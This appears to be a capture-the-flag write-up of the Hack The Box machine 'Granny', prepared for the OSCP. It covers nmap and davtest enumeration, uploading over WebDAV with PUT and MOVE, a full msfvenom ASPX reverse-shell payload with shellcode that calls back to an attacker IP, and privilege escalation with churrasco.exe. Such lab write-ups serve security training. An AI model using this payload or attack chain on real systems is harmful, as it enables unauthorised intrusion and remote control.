TJ_Null’s OSCP Prep – HTB – Granny
This is a Windows box which have a vulnerable IIS webserver running. This webserver allowed different HTTP methods such as PUT, MOVE, PROPFIND. So it was possible to upload a shell. I used davtest which tries uploading executables and files that can give us remote code execution. To privilege escalate I had to be creative using a exploit that could give me command injection as NT AUTHORITY\SYSTEM and from there running a payload that would grant me a privileged shell.
Table Of Contents
Enumeration
First lets start with an NMAP scan.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/granny]
└─# cat nmap.result.nmap
# Nmap 7.92 scan initiated Sat Jan 15 16:18:20 2022 as: nmap -sC -sV -p- --min-rate 10000 -oA nmap.result 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.034s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Server Date: Sat, 15 Jan 2022 21:20:34 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 15 16:18:41 2022 -- 1 IP address (1 host up) scanned in 21.11 secondsOnly port 80 open. The webserver is IIS httpd 6.0. Under Allowed Methods you can see all the HTTP methods we could use. The PUT method would allow us to upload a file, possibly a reverse shell.
We will use davtest to test WebDAV to see what kind of files we’re allowed to upload.
DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.
https://www.kali.org/tools/davtest/
But first, to understand whats happening, lets open up burpsuite and create a redirect.
This will bind port 80 to our loopback addrees (localhost(127.0.0.1)), and redirect traffic to port 80 and IP 10.10.10.15.
┌──(root💀kali)-[/home/…/Desktop/HTB/granny/iis6-exploit-2017-CVE-2017-7269]
└─# davtest -url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: uGPP82XIK
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_uGPP82XIK
********************************************************
Sending test files
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.cfm
PUT aspx FAIL
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jhtml
PUT cgi FAIL
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jsp
PUT php SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.php
PUT asp FAIL
PUT html SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.pl
PUT shtml FAIL
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC jhtml FAIL
EXEC jsp FAIL
EXEC php FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt
EXEC pl FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_uGPP82XIK
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.cfm
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jhtml
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jsp
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.php
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.pl
Executes: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
Executes: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt
Unfourtunatly we’re not allowed to PUT aspx on the webserver, however we’re allowed to use HTTP MOVE method. So we can upload a payload with HTML extension, and move it to ASPX extension. I’ll use burp suite for that.
Initial access
First lets test using the PUT method.
That worked. So now, lets try and generate a msfvenom payload, upload it to the webserver, move it to aspx extension and visit the website.
┌──(root💀kali)-[/usr/share/nmap/scripts]
└─# msfvenom -p windows/shell_reverse_tcp -f aspx lhost=10.10.14.17 lport=4444
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2729 bytes
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
protected void Page_Load(object sender, EventArgs e)
{
byte[] fC1 = new byte[324] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x0a,0x0a,0x0e,0x11,0x68,0x02,0x00,0x11,0x5c,0x89,
0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,
0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,
0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,
0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,
0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 };
IntPtr fWWG4NkmQz_Q = VirtualAlloc(IntPtr.Zero,(UIntPtr)fC1.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(fC1,0,fWWG4NkmQz_Q,fC1.Length);
IntPtr zjgG_tR3RI2 = IntPtr.Zero;
IntPtr r7uxHqKE = CreateThread(IntPtr.Zero,UIntPtr.Zero,fWWG4NkmQz_Q,IntPtr.Zero,0,ref zjgG_tR3RI2);
}
</script>PUT payload in /aghanim.html
MOVE /aghanim.html to /aghanim1.aspx
And now when we visit http://10.10.10.15/aghanim1.aspx, our netcat listener will have a connection.
Privilege Escalation
I’ll use Windows Exploit suggester. In order to use that I have to run systeminfo on the target and copy it to my local attacker machine. So there is no need to transfer a payload to the target.
From the output below we can see that this is a Windows Server 2003 Service Pack 2 build 2003. The system architect is x86.
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 5 Minutes, 12 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 802 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,338 MB
Page File: In Use: 132 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/AAnd running Windows Exploit suggester
┌──(root💀kali)-[/opt/Windows-Exploit-Suggester]
└─# python2 windows-exploit-suggester.py --systeminfo sys.txt -d 2022-01-14-mssb.xls
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
In the ouput above you get a list of many vulnerabilites due to not patched system. I will use this exploit to try and elevate my privilege. https://www.exploit-db.com/exploits/6705
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
HTTPS://WWW.EXPLOIT-DB.COM/EXPLOITS/6705
services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
Churrasco have made a exe file I can use.
So first, I download the exe file on my attacker machine, spin up a smbserver.py and run the exe file on the target machine.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/granny]
└─# smbserver.py share /home/aghanim/Desktop/HTB/granny/ 130 ⨯
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
So we can run commands using churrasco.exe as Administrator. I tried to add a user and add this user to local admin group. For some reason I didnt get it to work. So I opted for another solution.
Since I can run commands as NT AUTHORITY\SYSTEM I can probably also run programs with the same privilege. So I created a new payload using msfvenom, and copied it to the target machine.
And we have a shell as NT AUTHORITY\SYSTEM.
What I’ve learned
- Using insecure configuration on a webserver that allows us to use different HTTP methods could result in RCE.
- To be able to see what a script is running against a webserver, we can use burp to create a redirect from loopback to webserver, intercepting all traffic.
- Many of the privilege escaltion methods I tried did not work. And being creative with the tools you have can give you privilege escalation. As someone said before, privilege escalation is more art than technique.
